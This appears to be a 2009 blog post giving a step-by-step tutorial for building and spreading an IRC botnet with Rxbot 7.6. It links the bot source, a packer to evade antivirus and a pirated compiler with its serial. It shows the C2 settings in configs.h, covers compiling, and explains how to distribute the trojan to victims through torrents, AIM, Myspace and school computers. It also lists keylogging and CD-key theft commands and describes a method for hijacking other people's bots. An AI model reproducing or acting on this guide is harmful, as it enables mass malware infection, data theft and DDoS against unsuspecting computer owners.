Friday, March 6, 2009
How to buil a botnet (revised)
There are many tutorials around but I thought I would post one to help people.In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:Code:http://rapidshare.com/files/206237223/rbot_7.6_source_code.zip.htmlCompiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.Q:What is a botnet?A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".Depending on the source you used, the bot can do several things.But once again depending on the source you can :Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".Once again depending on the bot it may be able to kill other fellow competeter bots.Or even kill AV/FW apon startup.Add itself to registry.Open sites.Open commands.Cmd,notepad,html,Anything is possible !Theres the infected computers "bots" the attacker, the server, and the victim.Quote:while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."Botnets are being used for Google Adword click fraud, according to security watchers.Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.---------------Ignore anything about using the server editor but this tutorial show how to make the trojan undetectable and spread bots:Code:http://rapidshare.com/files/206234923/packer_installer.exe.htmlHere we go ladies and gentlemenFollow the tutorial:I. Setting up the C++ compilier: (easy)Download Code:http://www.megaupload.com/?d=SUHPYZRXCode:Pass: itzforblitzSerial: 812-22245582. Run setup.exe and install. Remember to input serial3. Download and install the Service Pack 6 (60.8 mb) Code:http://www.microsoft.com/downloads/d...displaylang=enAfter that Download and install:Windows SDK (1.2 mb) Code:http://www.megaupload.com/?d=YH3SS78IPass: itzforblitzII. Configuring the C++ compilier (easy)1. Open up Microsoft Visual C++ Compilier 6.02. Go to Tools > Options and Click the "Directories" tab3. Now, browse to these directories and add them to the list: (Click the dotted box to add)Quote:C:\PROGRAM FILES\MICROSOFT PLATFORM SDKC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BINC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDEC:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB4. Now put them in this order: (use up and down arrows)(it does not matter whats below those lines)III. Configuring your bot: (easy)1. Download and unpack:Rxbot 7.6 (212.3 kb) Code:http://rapidshare.com/files/21854222...7.6rx.rar.html2. You should see an Rxbot 7.6 folder3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:Quote:Put in quotations:char password[] = "Bot_login_pass"; // bot password (Ex: monkey)char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)char serverpass[] = ""; // server password (not usually needed)char channel[] = "#botz_channel"; // channel that the bot should joinchar chanpass[] = "My_channel_pass"; // channel passwordOptional:char server2[] = ""; // backup serverchar channel2[] = ""; // backup channelchar chanpass2[] = ""; //Backup channel passIV. Building your bot: (very easy)1. Make sure Microsoft Visual C++ is open2. Select "File > Open Workspace"3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file4. Right Click "rBot Files" and click Build:5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !Command listDownload Command list Code:http://rapidshare.com/files/21542921/cmands.htmlBasics:.login botpassword will login bots.logout will logout bots.keylog on will turn keylogger on.getcdkeys will retrieve cdkeys.Read command list for moreDownload mIRCCode:http://dw.com.com/redir?edId=3&siteI...part%3Ddl-mIRCHow to secure your bots:Don't be an arse it is easy to steal bots. All you need is the irc server address and maybe a key.To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)and update the channel topic and run:Quote:@update Code:http://www.mybot.com/download/SMSPRO.exe82The Code:http://mybot.comis your bot's download link and the 82 can be any number(s)Now steal their bots and have them join your channelTo find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.To secure your self:It is fairly easy to secure your bots, here is how:1. When you are in your right click on your chat window and select "Channel Modes"2. Make sure these options are checked:This way no one besides you or another op can set the channel topicNote: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment